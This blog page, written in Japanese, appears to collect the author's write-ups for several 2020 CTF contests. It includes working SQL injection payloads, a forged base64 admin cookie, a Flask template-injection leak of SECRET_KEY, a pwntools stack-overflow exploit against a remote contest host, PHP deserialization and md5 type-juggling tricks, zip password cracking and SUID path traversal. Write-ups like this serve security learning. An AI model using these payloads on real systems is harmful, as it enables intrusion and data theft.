kanyewest CTF

勉強したことをメモしています。

PeaCTF 2020: Write up

CTF

Web Exploitation

Eff-twelve

ソースコードを見るだけ。

<!--FLAG: peaCTF{b3a96a5c-71df-455d-8035-0df702546173}-->

Bots

/robots.txtにアクセスすると

User-agent: *
Sitemap: /sitemap.xml

/sitemap.xmlにアクセスすると

<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xhtml="http://www.w3.org/1999/xhtml">
<script/>
<script/>
<url>
<loc>/index.html</loc>
<lastmod>2019-04-10T09:51:57+06:00</lastmod>
</url>
<url>
<loc>/97FXwpouwwbmrt7dqxf53AEbiQkmuazB.html</loc>
<lastmod>2019-04-10T09:51:57+06:00</lastmod>
</url>
</urlset>

/97FXwpouwwbmrt7dqxf53AEbiQkmuazB.htmlにアクセスするとFlagがある。

Secure Admin

username='+OR+1=1#&password='でPOSTすると

HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Sat, 24 Oct 2020 11:34:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.4.0RC6
Content-Length: 81

Login success. Welcome! Your flag is peaCTF{2be8b136-325a-40ff-a6b3-6cb1dba72c96}

Secure Admin 2

POST /login.php HTTP/1.1
Host: 45.32.128.108:28064
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ja,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://45.32.128.108:28064
Connection: close
Referer: http://45.32.128.108:28064/
Cookie: _auth=WVdSdGFXNDZabUZzYzJVPQ==
Upgrade-Insecure-Requests: 1

username=admin&password=admin

Cookie_authの値がbase64エンコードされてて怪しいので

$ echo -n 'WVdSdGFXNDZabUZzYzJVPQ==' | base64 -d | base64 -d
admin:false

なので

$ echo -n 'admin:true' | base64 | base64
WVdSdGFXNDZkSEoxWlE9PQo=

でPOSTするだけ

flaskookies

サーバサイドテンプレートインジェクションの脆弱性があり

name={{+config+}}でPOSTすると

&lt;Config {&#39;ENV&#39;: &#39;production&#39;, &#39;DEBUG&#39;: False, &#39;TESTING&#39;: False, &#39;PROPAGATE_EXCEPTIONS&#39;: None, &#39;PRESERVE_CONTEXT_ON_EXCEPTION&#39;: None, &#39;SECRET_KEY&#39;: b&#39;\x7f:&amp;\xcaKu\x9c\x88\x00S\xd3wC\x01&#34;\xaa\xbf\xec8H{|9\xe7&#39;, &#39;PERMANENT_SESSION_LIFETIME&#39;: datetime.timedelta(days=31), &#39;USE_X_SENDFILE&#39;: False, &#39;SERVER_NAME&#39;: None, &#39;APPLICATION_ROOT&#39;: &#39;/&#39;, &#39;SESSION_COOKIE_NAME&#39;: &#39;session&#39;, &#39;SESSION_COOKIE_DOMAIN&#39;: False, &#39;SESSION_COOKIE_PATH&#39;: None, &#39;SESSION_COOKIE_HTTPONLY&#39;: True, &#39;SESSION_COOKIE_SECURE&#39;: False, &#39;SESSION_COOKIE_SAMESITE&#39;: None, &#39;SESSION_REFRESH_EACH_REQUEST&#39;: True, &#39;MAX_CONTENT_LENGTH&#39;: None, &#39;SEND_FILE_MAX_AGE_DEFAULT&#39;: datetime.timedelta(seconds=43200), &#39;TRAP_BAD_REQUEST_ERRORS&#39;: None, &#39;TRAP_HTTP_EXCEPTIONS&#39;: False, &#39;EXPLAIN_TEMPLATE_LOADING&#39;: False, &#39;PREFERRED_URL_SCHEME&#39;: &#39;http&#39;, &#39;JSON_AS_ASCII&#39;: True, &#39;JSON_SORT_KEYS&#39;: True, &#39;JSONIFY_PRETTYPRINT_REGULAR&#39;: False, &#39;JSONIFY_MIMETYPE&#39;: &#39;application/json&#39;, &#39;TEMPLATES_AUTO_RELOAD&#39;: None, &#39;MAX_COOKIE_SIZE&#39;: 4093, &#39;flag&#39;: &#39;peaCTF{61c3d4bc-bb7f-451a-80aa-d6bc485b6e4e}\n&#39;}&gt;.1

flagが含まれたレスポンスが返ってくる。

Misc

Corrupt

$ file filetype.txt
filetype.txt: PNG image data, 848 x 242, 8-bit/color RGBA, non-interlaced
$ mv filetype.txt filetype.png

f:id:tekashi:20201024203944p:plain

General Skills

Warm-up 0

$ ssh peactf@45.32.128.108 -p28058sshを接続する。

適当にコマンド打ってたらflagがでてきた。

peactf@24414320bbe0:~/warm-up-1$ cat */*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*
cat: 10f9357a7fac9f8f31fdda5c18f382d4/f2819060afbbbf272fcbd6b6e5b8e888/67fdc7da6abdd2e13ccd06d03c7f6ed9/6cb32a3f3bfb34892d818d9817462a57/2bc6bd841f6392b899430648f2713306/a976fe7fc9c871b0090a5a4df73047ff/7b8dc35d8c370eb90969fa0ce9e077dd/e19595bffbbcde2416a3869977497551/575dcacf949278cffc01d88b14ce8943/d8f70020a6af45a3e5cbd26dfda4df84/f6fc10fc9bc26eded5bd3b47395543cb/13c6f06242287e3e7ca9c0d5e78874c0/20c88d805bdf6907e8bb5fbc0872e78f/2948c8cb5e4bc8502afd55c5534b2a00/cbc277a31de58bc73661e65354bbf4dd/d62ddd73380cb2d78e43d2cfb115024c/6f45a03c1c16a50af7bb41b38b3389d5/2baea4352b4a0ffc3aa1ecd79923c733/04e93cc067887f2b12927677d4afceb0/46fe9148c7d3c7bd7816b33150eed073: Is a directory
peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}cat: 83370d0db0a379ecbcf3712438e5a2d5/f4d867be7c1e73c30adc5ff5d250ab1e/742d095ed2fd662103f1109190915681/2879994fff5740f88b11a526639dd2ea/8c6e7633dd7abc4c4c1d638db3efeef2/4132d59ad394bb625c0a73f08c787299/f743ac55bfe998088df77611fafbc37a/43f86e20ccb49cf84fddd02b48a13e91/215cb96942bf38538acb429a977786b4/f936451b5dfc811d590efe84796b3603/115c7b3da791fdee1dfbbe99d4b4855b/2aa9fe49e3d463520ecafa4e73864ef4/8fbfab97e9d3c0093c6821aa80ee5890/68bb4d97da240cf334a49b387ebdf682/61e43e5731f259ce39bd351329b75aae/07e7f165fb485c994994cd8506aec813/cbd53cb7b03a946fa64ca9e6bd1057e2/9cde2ff360268b6afaa7b85f70205c68/c331b1086c98118a70ea9269c784de6e/a2f680bf6ce1170240d53c8a421a4346: Is a directory
peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}cat: f5ad680e0142e8f0834325b61feceee7/55ac7c6cad407189c37d25f0d31c4af0/66ee00647434e499e11532be9f7225a4/87970f657f63eb2624b5a149b4d4c99f/d338cf937923618f103ce9d0186da1a0/2b2d393c32bef3ca9461ac6edd279289/4d7d7ee378382a2164ab5168826a002e/6e670f25e01baf7f56868130e131bf25/4edfdd8562c59422dcd2a4b3cc6e3f2c/4cdc6806225fbd266ca5d6da20750ba1/31d58b08c604c14c85814e05fb9c6749/50e578a9617796d83b1b906d61614e7b/5ee0983bc96ebe70d50f8854239e2b51/d6a068548992e87131c4e40f6493f68b/469f14ab42d8f92f8b31eef0c8a2f28c/77882f6d68ccf3f257fb3c0784e8e238/94afaa03edbf1347aca0afba2186579f/33746a4bdfcfe234658b33e910576c27/4e516ed4e7771bfadc06bf3aa7ef704e/fcc1742a517e2d32f16a3f25852c2dbf: Is a directory

CyberYoddha CTF: Write up

CTF

Web

Look Closely

ソースコードを見るだけ

Disallow

/robots.txtをみるだけ

Something Sw33t

don't look hereという明らかに怪しいCookieが含まれている。

Cookie: don't look here=.eJyVU2tPwjAU_StLP4tsA9QR90EUxMWRQHQvNdh1d6zYDrOHZiP7746pgUhsoGna5tzTnnNvbtfoKs0YFK0R5pQVLRO4D0mK-mcnKGwg1F-j6yLOIoqlby7qP61RAClJ6HtGV_GGIQW02fz5HPVRTAmgqqqfYHixH_a5Jjuq1cXORHbtntxQY8xhn_pHuaqZB2iDLlB3-aj0HtzaASudzkQhY4P59qMucDFeJZjAESainONY4GGD6k3of9HnXJZDbbMC2Z5DvINcNKu_gwRb_AcJ925BV2mfqu1Lpf2qtLvqIflkEUjijKYKu7GG3rl5m4WmpZWebYVga4qjKhHYBnM67COwtIhwKyQ1RuKZJkh-RsnbEfUuAILfuRkCo8HY6DnqKHZtlgsM3EMM0gDnKV5AcoiFPOJc1PPLwWddE-ZNdVGnGbiodU2cpNFBfUYjKhYN3eVAJoq2Mjt3pUB4WP91utviL1X1BXD8TWE.X4ovdw.rz4sSG_k2heOMf7Cw_C6Kliw7Ms
$ pip3 install flask-unsign
$ flask-unsign --decode --cookie '.eJyVU2tPwjAU_StLP4tsA9QR90EUxMWRQHQvNdh1d6zYDrOHZiP7746pgUhsoGna5tzTnnNvbtfoKs0YFK0R5pQVLRO4D0mK-mcnKGwg1F-j6yLOIoqlby7qP61RAClJ6HtGV_GGIQW02fz5HPVRTAmgqqqfYHixH_a5Jjuq1cXORHbtntxQY8xhn_pHuaqZB2iDLlB3-aj0HtzaASudzkQhY4P59qMucDFeJZjAESainONY4GGD6k3of9HnXJZDbbMC2Z5DvINcNKu_gwRb_AcJ925BV2mfqu1Lpf2qtLvqIflkEUjijKYKu7GG3rl5m4WmpZWebYVga4qjKhHYBnM67COwtIhwKyQ1RuKZJkh-RsnbEfUuAILfuRkCo8HY6DnqKHZtlgsM3EMM0gDnKV5AcoiFPOJc1PPLwWddE-ZNdVGnGbiodU2cpNFBfUYjKhYN3eVAJoq2Mjt3pUB4WP91utviL1X1BXD8TWE.X4ovdw.rz4sSG_k2heOMf7Cw_C6Kliw7Ms'
{'Astley-Family-Members': 6, 'family': {'Cynthia Astley': [{'description': {' di': {' b__': 'nice'}}, 'flag': {' di': {' b__': 'bm90X2V4aXN0YW50'}}, 'name': {' di': {' b__': 'Cynthia Astley'}}}, {'description': {' di': {' b__': 'nicee='}}, 'flag': {' di': {' b__': 'YmFzZTY0X2lzX3N1cHJlbWU='}}, 'name': {' di': {' b__': 'Horace Astley'}}}, {'description': {' di': {' b__': 'human'}}, 'flag': {' di': {' b__': 'flag=flag'}}, 'name': {' di': {' b__': 'ùìùúìøûìýøìÿúìþ41/.2/<1/`1/42'}}}, {'description': {' di': {' b__': 'the man'}}, 'flag': {' di': {' b__': 'Q1lDVEZ7MGtfMV9zZWVfeW91X21heWJlX3lvdV9hcmVfc21hcnR9'}}, 'name': {' di': {' b__': 'Rick Astley'}}}, {'description': {' di': {' b__': 'yeedeedeedeeeeee'}}, 'flag': {' di': {' b__': 'dHJ5X2FnYWlu'}}, 'name': {' di': {' b__': 'Lene Bausager'}}}, {'description': {' di': {' b__': 'uhmm'}}, 'flag': {' di': {' b__': 'bjBwZWVlZQ=='}}, 'name': {' di': {' b__': 'Jayne Marsh'}}}, {'description': {' di': {' b__': 'hihi'}}, 'flag': {' di': {' b__': 'bjBfYjB0c19oM3Iz'}}, 'name': {' di': {' b__': 'Emilie Astley'}}}]}}
$ echo -n 'Q1lDVEZ7MGtfMV9zZWVfeW91X21heWJlX3lvdV9hcmVfc21hcnR9' | base64 -d
CYCTF{0k_1_see_you_maybe_you_are_smart}

Password Cracking

secure (i think?)

md5でハッシュ化されてるだけ

Crack the Zip!

$ fcrackzip flag.zip -D -p ./rockyou.txt -u flag.zip

PASSWORD FOUND!!!!: pw == not2secure
$ unzip flag.zip
Archive:  flag.zip
[flag.zip] flag.txt password:
 extracting: flag.txt
$ cat flag.txt
cyctf{y0u_cr@ck3d_th3_z!p...}

Me, Myself, and I

2412f72f0f0213c98c1f9f6065728da4529000e5c3a2e16c4e1379bd3e13ccf543201eec4eb7b400eb5a6c9b774bf0c0eeda44869e08f3a54a0b13109a7644aa

f:id:tekashi:20201031122125p:plain

ISCCTF 2020: Write up

CTF

Pwn

stuck

from pwn import *

e = ELF('./chall')
#p = process('./chall')
p = remote('34.84.136.181',4000)

ret_addr = 0x0040101a
flag_addr = e.symbols['win']

payload = 'A'*112
payload += p64(ret_addr)
payload += p64(flag_addr)

p.sendline(payload)
p.interactive()

└─$ python main.py
[*] '/home/kali/ISSCTF2020/stuck/chall'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to 34.84.136.181 on port 4000: Done
[*] Switching to interactive mode
What's your name?
> 
Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x1a@, I'm full stuck engineer!!!!!.
ISCCTF{Y0u_kn0w_5t4ck_0v3rfl0w}

Reversing

strings

stringsコマンドを使うだけ。

Web

Greetings

/js/greet.jsのソースを見るだけ。

Yonezer

ソースを見ると

<html>
<head>
    <meta charset="UTF-8">
    <link rel="stylesheet" href="style.css">
</head>
<body>

<?php

function html($string) {
    return htmlspecialchars($string);
}

$flag = file_get_contents("../flag.txt");

class secret{

    public function data(){
        global $flag;
        echo($flag);
    }

}



class share_video{
    public $text="Hello Everone";

    public function data(){
        echo("<h1>" . html($this->text) . "</h1><br>");
        echo("<MARQUEE><h1>Do you like this video &#x1f440;?</h1></MARQUEE>\n");
        $urls = ["https://www.youtube.com/embed/s582L3gujnw","https://www.youtube.com/embed/gJX2iy6nhHc", "https://www.youtube.com/embed/SX_ViT4Ra7k","https://www.youtube.com/embed/Zw_FKq10S8M"];
        $num = rand(0,3);
        $url = $urls[$num];
        echo ("<div id=\"all\"><iframe width=\"1000\" height=\"600\" src=\"". $url . "\"></iframe></div>");

        }
    }


$serialized = @$_GET["data"];
$hoge = @unserialize($serialized);
if($hoge){
    $hoge->data();

}
?>
</body>
</html>

入力をそのままデシリアライズしてる脆弱性があることがわかる。

<?php
class secret{}

$a = New secret();
echo serialize($a)
?>

$ php main.php
O:6:"secret":0:{}

mark damn it

ソースコードが渡されてGemfileを見てみるとgem "kramdown", "2.2.1"と書かれてる。

調べてみると、任意のファイルを読み込んだり、任意のコードを実行できる脆弱性があるっぽい。

f:id:tekashi:20201024174737p:plain

f:id:tekashi:20201024174748p:plain

Hacktober CTF: Write up

CTF

SQLはまじでただのSQLだったので全部解いておきたかったけど気づいたら終わってた。

Linux

Talking to the Dead 1

luciafer@a4e8c21f2f51:/$ cd ~
luciafer@a4e8c21f2f51:~$ ls -al *
Documents:
total 20
drwxrwxr-x 1 luciafer luciafer 4096 Oct  6 08:36 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct  5 14:54 ..
-rw-rw-r-- 1 luciafer luciafer   47 Oct  6 08:36 .flag2.txt
-rw-rw-r-- 1 luciafer luciafer   47 Oct  5 14:55 flag1.txt

Downloads:
total 12
drwxrwxr-x 2 luciafer luciafer 4096 Oct  5 14:54 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct  5 14:54 ..

Pictures:
total 12
drwxrwxr-x 2 luciafer luciafer 4096 Oct  5 14:54 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct  5 14:54 ..

Videos:
total 12
drwxrwxr-x 2 luciafer luciafer 4096 Oct  5 14:54 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct  5 14:54 ..
luciafer@a4e8c21f2f51:~$ cat ~/Documents/flag1.txt
flag{cb07e9d6086d50ee11c0d968f1e5c4bf1c89418c}

Talking to the Dead 2

luciafer@a4e8c21f2f51:~$ cat ~/Documents/.flag2.txt
flag{728ec98bfaa302b2dfc2f716d3de7869f3eadcbf}

Talking to the Dead 3

luciafer@a4e8c21f2f51:/$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/umount
/usr/bin/passwd
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/chfn
/usr/local/bin/ouija
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
luciafer@a4e8c21f2f51:/$ /usr/local/bin/ouija ../home/spookyboi/Documents/flag3.txt
flag{445b987b5b80e445c3147314dbfa71acd79c2b67}

Talking to the Dead 4

luciafer@a4e8c21f2f51:/$ /usr/local/bin/ouija flag4.txt
flag{4781cbffd13df6622565d45e790b4aac2a4054dc}

SQL

Past Demons

sqlite> .tables
passwd  users
sqlite> select * from passwd;
1|4E6C0DBCCA0E45C805CE753C5974B3F9|1
2|8D302A5C9E06C8A6A52778A09583FD2C|2
3|3AC0D175A50406327CBE0BA0C6675892|3
4|6D5A4277C1F826D5EAAF08F63AEC84C5|4
5|CDF78099FBBBB52BE1AAA086D60289BC|5
6|66E85956792A2BEE9AA95B6F2662297F|6
7|EF468A19E03DDFD6D91ACF6602F71AF9|7
8|59DEA36D05AACAA547DE42E9956678E7|8
9|EB62D05A31866DFF8EC4EF28BAEF9377|9
10|2E8FF4B113C64A3C4B3F9D53AB1F0C53|10
sqlite> select * from users;
1|manage.po1nt|
2|carriage_5enior241|
3|s7r3am5ilver708|
4|MAL1A.PURS3LL|
5|monarch.kne3|
6|d1sp1ay.5hrink1484|
7|f1awed4unt1274|
8|spookyboi|
9|ankle_r3vive|
10|5ay_crosswalk1719|

59DEA36D05AACAA547DE42E9956678E7md5でハッシュ化されてるので適当なサイトで復号するだけ

Body Count

def main():
    data = //mysqlをdumpしたファイルに入ってたデータ
    d = data.split(',')
    for i in range(len(d)):
        if 'HAVRON' in d[i]:
            print(i)
    print(d[579:600])

if __name__ == "__main__":
    main()

(base) 0:11 ~/CTF $ python3 main.py
579
(base) 0:12 ~/CTF $ python3 main.py
579
["'HAVRON'", "'R'", "'luc1afer.h4vr0n@shallowgraveu.com'", "'2991 Y Alley'", "'Broken Bow'", '38', "'27856'", "'f'", "'1987-12-13')", '(50', "'cast.pipe9065'", "'RICH'", "'KUCUK'", "'S'", "'cast.pipe9065@zellox.net'", "'664 Papaya Ln'", "'Charlestown'", '34', "'3603'", "'m'", "'1985-05-17')"]

Null and Void

$ mysql -u root -p testdb < ./shallowgraveu.sql
mysql> show columns from users;
+----------+-------------+------+-----+---------+----------------+
| Field    | Type        | Null | Key | Default | Extra          |
+----------+-------------+------+-----+---------+----------------+
| user_id  | int         | NO   | PRI | NULL    | auto_increment |
| username | varchar(52) | NO   | UNI | NULL    |                |
| first    | varchar(52) | NO   |     | NULL    |                |
| last     | varchar(52) | NO   |     | NULL    |                |
| middle   | varchar(24) | YES  |     | NULL    |                |
| email    | varchar(52) | NO   | UNI | NULL    |                |
| street   | varchar(52) | NO   |     | NULL    |                |
| city     | varchar(52) | NO   |     | NULL    |                |
| state_id | int         | NO   | MUL | NULL    |                |
| zip      | varchar(10) | NO   |     | NULL    |                |
| gender   | varchar(8)  | NO   |     | NULL    |                |
| dob      | date        | NO   |     | NULL    |                |
+----------+-------------+------+-----+---------+----------------+
12 rows in set (0.01 sec)

DarkCTF: Write up

CTF

Web

Source

f:id:tekashi:20200925224308p:plain

ソースファイルをみてみると

<html>
    <head>
        <title>SOURCE</title>
        <style>
            #main {
    height: 100vh;
}
        </style>
    </head>
    <body><center>
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<?php
$web = $_SERVER['HTTP_USER_AGENT'];
if (is_numeric($web)){
      if (strlen($web) < 4){
          if ($web > 10000){
                 echo ('<div class="w3-panel w3-green"><h3>Correct</h3>
  <p>darkCTF{}</p></div>');
          } else {
                 echo ('<div class="w3-panel w3-red"><h3>Wrong!</h3>
  <p>Ohhhhh!!! Very Close  </p></div>');
          }
      } else {
             echo ('<div class="w3-panel w3-red"><h3>Wrong!</h3>
  <p>Nice!!! Near But Far</p></div>');
      }
} else {
    echo ('<div class="w3-panel w3-red"><h3>Wrong!</h3>
  <p>Ahhhhh!!! Try Not Easy</p></div>');
}
?>
</center>
<!-- Source is helpful -->
    </body>
</html>

if (is_numeric($web)){ if (strlen($web) < 4){ if ($web > 10000){

User Agentを数値にして3桁以内で10000を超えればflagが出てくることがわかる。

is_numericについて調べてたらeを使えばいいことに気づいた。 1e6だとおそらく106になってるはず??

GET / HTTP/1.1
Host: source.darkarmy.xyz
User-Agent: 1e6
<h3>Correct</h3>
  <p>darkCTF{changeing_http_user_agent_is_easy}</p>

Apache Logs

Apacheのログが渡されて、眺めているとSQLiをしようとしている部分がみつかり怪しいと思いながら見てみるとfromCharCodeをつかっているのでasciiコードに変換してWAFをbypassする文字列を作っているのはでないかと考えた。

$ cat logs.ctf | grep "fromCharCode"
192.168.32.1 - - [29/Sep/2015:03:37:34 -0400] "GET /mutillidae/index.php?page=user-info.php&username=%27+union+all+select+1%2CString.fromCharCode%28102%2C+108%2C+97%2C+103%2C+32%2C+105%2C+115%2C+32%2C+83%2C+81%2C+76%2C+95%2C+73%2C+110%2C+106%2C+101%2C+99%2C+116%2C+105%2C+111%2C+110%29%2C3+--%2B&password=&user-info-php-submit-button=View+Account+Details HTTP/1.1" 200 9582 "http://192.168.32.134/mutillidae/index.php?page=user-info.php&username=something&password=&user-info-php-submit-button=View+Account+Details" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
192.168.32.1 - - [29/Sep/2015:03:39:46 -0400] "GET /mutillidae/index.php?page=client-side-control-challenge.php HTTP/1.1" 200 9197 "http://192.168.32.134/mutillidae/index.php?page=user-info.php&username=%27+union+all+select+1%2CString.fromCharCode%28102%2C%2B108%2C%2B97%2C%2B103%2C%2B32%2C%2B105%2C%2B115%2C%2B32%2C%2B68%2C%2B97%2C%2B114%2C%2B107%2C%2B67%2C%2B84%2C%2B70%2C%2B123%2C%2B53%2C%2B113%2C%2B108%2C%2B95%2C%2B49%2C%2B110%2C%2B106%2C%2B51%2C%2B99%2C%2B116%2C%2B49%2C%2B48%2C%2B110%2C%2B125%29%2C3+--%2B&password=&user-info-php-submit-button=View+Account+Details" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
>>> s = "102,108,97,103,32,105,115,32,68,97,114,107,67,84,70,123,53,113,108,95,49,110,106,51,99,116,49,48,110,125"
>>> s.split()
['102,108,97,103,32,105,115,32,68,97,114,107,67,84,70,123,53,113,108,95,49,110,106,51,99,116,49,48,110,125']
>>> s.split(",")
['102', '108', '97', '103', '32', '105', '115', '32', '68', '97', '114', '107', '67', '84', '70', '123', '53', '113', '108', '95', '49', '110', '106', '51', '99', '116', '49', '48', '110', '125']
>>> t = map(int,s.split(","))
>>> t
[102, 108, 97, 103, 32, 105, 115, 32, 68, 97, 114, 107, 67, 84, 70, 123, 53, 113, 108, 95, 49, 110, 106, 51, 99, 116, 49, 48, 110, 125]
>>> result = ''
>>> for i in t:
...     result += chr(i)
...
>>> result
'flag is DarkCTF{5ql_1nj3ct10n}'

So_Simple

問題文に

Try id as parameter と書かれてるので適当に与えてみます。

f:id:tekashi:20200926152658p:plain

'をつけてGETしてみるとMySQLのエラーが出ます。

f:id:tekashi:20200926152856p:plain

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''8 OR 1'' LIMIT 0,1' at line 1

おそらくSQLiができると推測できます。

'or+'A'='A
Your Login name:LOL
Your Password:Try
' union select 1,2,3 and 'A'='A
Your Login name:2
Your Password:1
GET /?id='+union+select+1,group_concat(table_name),3+from+information_schema.columns+where+table_schema='id14831952_security'%23 
<font size='5' color= '#05ff1a'>Your Login name:emails,emails,referers,referers,referers,uagents,uagents,uagents,uagents,users,users,users<br>Your Password:3</font>
GET /?id='+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_schema='id14831952_security'%23 
<font size='5' color= '#05ff1a'>Your Login name:id,email_id,id,referer,ip_address,id,uagent,ip_address,username,id,username,password<br>Your Password:3</font>
GET /?id='+union+select+1,group_concat(username),group_concat(password)+from+users%23 HTTP/1.1
<font size='5' color= '#05ff1a'>Your Login name:LOL,Try,fake,its secure,not,dont read,try to think ,admin,flag<br>Your Password:Try ,another,<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="7f0f3f0c0c08100d1b">[email&#160;protected]</a>,dont try to hack,easy,my database,new,darkCTF{this_is_not_a_flag},darkCTF{uniqu3_ide4_t0_find_fl4g}</font>

Simple_SQL

f:id:tekashi:20200926140305p:plain

ソースをみると

<!-- Try id as parameter  -->

なのでidにSQLiすんのかな〜と思ったら適当に数値与えたらflagがでてきた

f:id:tekashi:20200926140343p:plain

PHP İnformation

<?php

include "flag.php";

echo show_source("index.php");


if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['darkctf'])){
        $darkctf = $res['darkctf'];
    }
}

if ($darkctf === "2020"){
    echo "<h1 style='color: chartreuse;'>Flag : $flag</h1></br>";
}

if ($_SERVER["HTTP_USER_AGENT"] === base64_decode("MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==")){
    echo "<h1 style='color: chartreuse;'>Flag : $flag_1</h1></br>";
}


if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['ctf2020'])){
        $ctf2020 = $res['ctf2020'];
    }
    if ($ctf2020 === base64_encode("ZGFya2N0Zi0yMDIwLXdlYg==")){
        echo "<h1 style='color: chartreuse;'>Flag : $flag_2</h1></br>";
                
        }
    }



    if (isset($_GET['karma']) and isset($_GET['2020'])) {
        if ($_GET['karma'] != $_GET['2020'])
        if (md5($_GET['karma']) == md5($_GET['2020']))
            echo "<h1 style='color: chartreuse;'>Flag : $flag_3</h1></br>";
        else
            echo "<h1 style='color: chartreuse;'>Wrong</h1></br>";
    }



?>

基本的にここに書かれてるとおりにすれば少しずつflagが見えてくるっぽい。

?darkctf=2020

f:id:tekashi:20200926190219p:plain

$ echo -n 'MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==' | base64 -d
2020_the_best_year_corona
GET / HTTP/1.1
Host: php.darkarmy.xyz:7001
User-Agent: 2020_the_best_year_corona
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ja,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: __cfduid=d67ed7d4832df7f3c8a7d6822a0e738461601037610
Upgrade-Insecure-Requests: 1
1<h1 style='color: chartreuse;'>Flag : very_</h1>
$ echo -n 'ZGFya2N0Zi0yMDIwLXdlYg==' | base64
WkdGeWEyTjBaaTB5TURJd0xYZGxZZz09

f:id:tekashi:20200926190114p:plain

md5の衝突に関してはPHP: md5 - Manualを参考にする。

md5('240610708') == md5('QNKCDZO')

This comparison is true because both md5() hashes start '0e' so PHP type juggling understands these strings to be scientific notation.  By definition, zero raised to any power is zero.

f:id:tekashi:20200926190038p:plain

DarkCTF{very_nice_web_challenge_dark_ctf}

Linux

linux starter

wolfie@9ad161dbc9ce:~$ ls
bin  imp
wolfie@9ad161dbc9ce:~$ ls *
bin:
cat

imp:
flag.txt
wolfie@9ad161dbc9ce:~$ cd imp
wolfie@9ad161dbc9ce:~/imp$ cat flag.txt
darkCTF{h0pe_y0u_used_intended_w4y}

Forensics

Wolfie's Contact

$ strings wolfie_evidence.E01 | grep "dark"

f!exchange.theme-dark_scale_311eaa1fbf83a7cbX
f!exchange.theme-dark_scale_311eaa1fbf88a906x
f!generic.theme-dark_scale-_ebc0582ed803d03c.
f!generic.theme-dark_scale-_ebba56b4d823d81ch
f!generic.theme-dark_scale-_ebb655b8d830db4fl
f!generic.theme-dark_scale-_eb9c4f52d854e42bl
f!generic.theme-dark_scale-_eb924cdcd881ef3el
f!generic.theme-dark_scale-_eb6e4400d8d3032dn
f!generic.theme-dark_scale-_eb4a3b24d924171cl
f!darkblue_grad.jpg_34fdea014c6a84e41
  - Add different color schemes for dark and light backgrounds
                #dark background
<c:Notes>darkCTF{</c:Notes><c:CreationDate>2020-09-20T18:18:41Z</c:CreationDate><c:Extended xsi:nil="true"/>
$ strings wolfie_evidence.E01 | grep -A 5 "<c:Notes>"
<c:Notes>All HAil Wolfiee!!!</c:Notes><c:CreationDate>2020-09-20T18:17:25Z</c:CreationDate><c:Extended xsi:nil="true"/>
<c:ContactIDCollection><c:ContactID c:ElementID="2c340172-c995-4931-9d72-58cb72e2cf94"><c:Value>aef8d632-7ff3-4991-b307-96a2c0542156</c:Value></c:ContactID></c:ContactIDCollection><c:EmailAddressCollection><c:EmailAddress c:ElementID="a1ab3325-0eb0-4d6b-91f4-76c0e3c29165"><c:Type>SMTP</c:Type><c:Address>allhail@wolfie.wolfcom</c:Address><c:LabelCollection><c:Label>Preferred</c:Label></c:LabelCollection></c:EmailAddress><c:EmailAddress c:ElementID="1cc98125-ad32-42b1-bb1b-e8937241baec" xsi:nil="true"/></c:EmailAddressCollection><c:NameCollection><c:Name c:ElementID="64961b9d-aa18-4569-a67a-b29bc8910d0b"><c:Title>Owner</c:Title><c:FormattedName>wolfie</c:FormattedName><c:GivenName>wolfie</c:GivenName></c:Name></c:NameCollection><c:PhysicalAddressCollection><c:PhysicalAddress c:ElementID="fca464b8-801b-4072-a457-85b2d755d2a4"><c:Country>Wolfie's World</c:Country><c:Locality>Wolf Gang</c:Locality><c:Street>Wolf Street</c:Street><c:LabelCollection><c:Label>Personal</c:Label></c:LabelCollection></c:PhysicalAddress></c:PhysicalAddressCollection><c:PhotoCollection><c:Photo 